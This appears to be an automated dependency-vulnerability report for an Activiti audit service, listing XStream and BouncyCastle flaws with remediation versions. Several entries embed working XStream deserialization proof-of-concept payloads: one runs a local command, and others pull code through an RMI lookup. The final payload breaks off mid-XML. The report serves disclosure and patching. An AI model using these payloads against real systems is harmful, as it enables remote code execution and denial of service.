Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker who has sufficient rights to execute local commands on the host only by manipulating the processed input stream.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
<indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
<packet>
<message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
<dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
<bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
<bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
<bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
<jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
<uriProperties/>
<attributeProperties/>
<inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
<getter>
<class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
<name>verify</name>
<parameter-types/>
</getter>
</inheritedAttWildcard>
</bi>
<tagName/>
<context>
<marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
<outer-class reference='../..'/>
</marshallerPool>
<nameList>
<nsUriCannotBeDefaulted>
<boolean>true</boolean>
</nsUriCannotBeDefaulted>
<namespaceURIs>
<string>1</string>
</namespaceURIs>
<localNames>
<string>UTF-8</string>
</localNames>
</nameList>
</context>
</bridge>
</bridge>
<jaxbObject class='com.sun.corba.se.impl.activation.com.sun.corba.se.impl.activation.ServerTableEntry'>
<activationCmd>calc</activationCmd>
</jaxbObject>
</dataSource>
</message>
<satellites/>
<invocationProperties/>
</packet>
</indexMap>
</comparator>
</default>
<int>3</int>
<string>javax.xml.ws.binding.attachments.inbound</string>
<string>javax.xml.ws.binding.attachments.inbound</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.
References
medium severity
- Vulnerable module: org.bouncycastle:bcprov-jdk15on
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.keycloak:keycloak-jetty94-adapter@3.4.0.Final › org.keycloak:keycloak-jetty-core@3.4.0.Final › org.bouncycastle:bcprov-jdk15on@1.56
Overview
org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.
Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') within the org.bouncycastle.openssl.PEMParser class. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError.
Workaround
The attack can be avoided by filtering PEM requests containing EXTERNAL tagged encodings.
Remediation
There is no fixed version for org.bouncycastle:bcprov-jdk15on.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.
PoC
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
<m__DTMXRTreeFrag>
<m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
<m__size>-10086</m__size>
<m__mgrDefault>
<__overrideDefaultParser>false</__overrideDefaultParser>
<m__incremental>false</m__incremental>
<m__source__location>false</m__source__location>
<m__dtms>
<null/>
</m__dtms>
<m__defaultHandler/>
</m__mgrDefault>
<m__shouldStripWS>false</m__shouldStripWS>
<m__indexing>false</m__indexing>
<m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
<fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
<javax.sql.rowset.BaseRowSet>
<default>
<concurrency>1008</concurrency>
<escapeProcessing>true</escapeProcessing>
<fetchDir>1000</fetchDir>
<fetchSize>0</fetchSize>
<isolation>2</isolation>
<maxFieldSize>0</maxFieldSize>
<maxRows>0</maxRows>
<queryTimeout>0</queryTimeout>
<readOnly>true</readOnly>
<rowSetType>1004</rowSetType>
<showDeleted>false</showDeleted>
<dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
<listeners/>
<params/>
</default>
</javax.sql.rowset.BaseRowSet>
<com.sun.rowset.JdbcRowSetImpl>
<default/>
</com.sun.rowset.JdbcRowSetImpl>
</fPullParserConfig>
<fConfigSetInput>
<class>com.sun.rowset.JdbcRowSetImpl</class>
<name>setAutoCommit</name>
<parameter-types>
<class>boolean</class>
</parameter-types>
</fConfigSetInput>
<fConfigParse reference='../fConfigSetInput'/>
<fParseInProgress>false</fParseInProgress>
</m__incrementalSAXSource>
<m__walker>
<nextIsRaw>false</nextIsRaw>
</m__walker>
<m__endDocumentOccured>false</m__endDocumentOccured>
<m__idAttributes/>
<m__textPendingStart>-1</m__textPendingStart>
<m__useSourceLocationProperty>false</m__useSourceLocationProperty>
<m__pastFirstElement>false</m__pastFirstElement>
</m__dtm>
<m__dtmIdentity>1</m__dtmIdentity>
</m__DTMXRTreeFrag>
<m__dtmRoot>1</m__dtmRoot>
<m__allowRelease>false</m__allowRelease>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>test</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary File Deletion. A remote attacker can delete arbitrary known files on the host as long as the executing process has sufficient rights, by manipulating the processed input stream.
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.15 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Denial of Service (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.20 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
<indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
<packet>
<message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
<dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
<bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
<bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
<bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
<jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>
<uriProperties/>
<attributeProperties/>
<inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
<getter>
<class>com.sun.rowset.JdbcRowSetImpl</class>
<name>getDatabaseMetaData</name>
<parameter-types/>
</getter>
</inheritedAttWildcard>
</bi>
<tagName/>
<context>
<marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
<outer-class reference='../..'/>
</marshallerPool>
<nameList>
<nsUriCannotBeDefaulted>
<boolean>true</boolean>
</nsUriCannotBeDefaulted>
<namespaceURIs>
<string>1</string>
</namespaceURIs>
<localNames>
<string>UTF-8</string>
</localNames>
</nameList>
</context>
</bridge>
</bridge>
<jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
<javax.sql.rowset.BaseRowSet>
<default>
<concurrency>1008</concurrency>
<escapeProcessing>true</escapeProcessing>
<fetchDir>1000</fetchDir>
<fetchSize>0</fetchSize>
<isolation>2</isolation>
<maxFieldSize>0</maxFieldSize>
<maxRows>0</maxRows>
<queryTimeout>0</queryTimeout>
<readOnly>true</readOnly>
<rowSetType>1004</rowSetType>
<showDeleted>false</showDeleted>
<dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
<params/>
</default>
</javax.sql.rowset.BaseRowSet>
<com.sun.rowset.JdbcRowSetImpl>
<default>
<iMatchColumns>
<int>-1</int>
<int>-1</int>
<int>-1</int>
<int>-1</int>
<int>-1</int>
<int>-1</int>
<int>-1</int>
<int>-1</int>
<int>-1</int>
<int>-1</int>
</iMatchColumns>
<strMatchColumns>
<string>foo</string>
<null/>
<null/>
<null/>
<null/>
<null/>
<null/>
<null/>
<null/>
<null/>
</strMatchColumns>
</default>
</com.sun.rowset.JdbcRowSetImpl>
</jaxbObject>
</dataSource>
</message>
<satellites/>
<invocationProperties/>
</packet>
</indexMap>
</comparator>
</default>
<int>3</int>
<string>javax.xml.ws.binding.attachments.inbound</string>
<string>javax.xml.ws.binding.attachments.inbound</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.
Details
Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.
Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.
Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.
An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.
Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.
References
medium severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to occupy a thread that consumes maximum CPU time and will never return. An attacker can manipulate the processed input stream and replace or inject objects, that result in executed evaluation of a malicious regular expression, causing a denial of service.
PoC
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='javafx.collections.ObservableList$1'/>
</default>
<int>3</int>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='java.io.SequenceInputStream'>
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
<iterator class='java.util.Scanner'>
<buf class='java.nio.HeapCharBuffer'>
<mark>-1</mark>
<position>0</position>
<limit>0</limit>
<capacity>1024</capacity>
<address>0</address>
<hb></hb>
<offset>0</offset>
